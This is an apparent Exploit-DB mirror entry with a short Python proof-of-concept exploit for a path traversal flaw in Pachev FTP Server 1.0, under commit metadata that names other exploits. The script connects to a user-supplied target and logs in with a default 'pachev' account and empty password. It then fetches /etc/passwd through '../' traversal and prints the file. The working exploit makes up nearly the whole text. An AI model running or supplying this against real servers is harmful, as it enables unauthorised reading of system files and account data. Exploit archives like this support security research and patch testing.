exploit-db-mirror/exploits/linux/remote/47956.py
Offensive Security a7338bf2c6 DB: 2020-01-24
4 changes to exploits/shellcodes

BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)

Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)

Pachev FTP Server 1.0 - Path Traversal

qdPM 9.1 - Remote Code Execution
2020-01-24 05:02:04 +00:00

19 lines
No EOL
589 B
Python
Executable file

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
# Date: 2020-01-23
# Vulnerability: Path Traversal
# Exploit Author: 1F98D
# Vendor Homepage: https://github.com/pachev/pachev_ftp
from ftplib import FTP
ip = raw_input("Target IP: ")
port = int(raw_input("Target Port: "))
ftp = FTP()
ftp.connect(host=ip, port=port)
ftp.login('pachev', '')
ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
ftp.close()
file = open('passwd.txt', 'r')
print "[**] Printing the contents of /etc/passwd\n"
print file.read()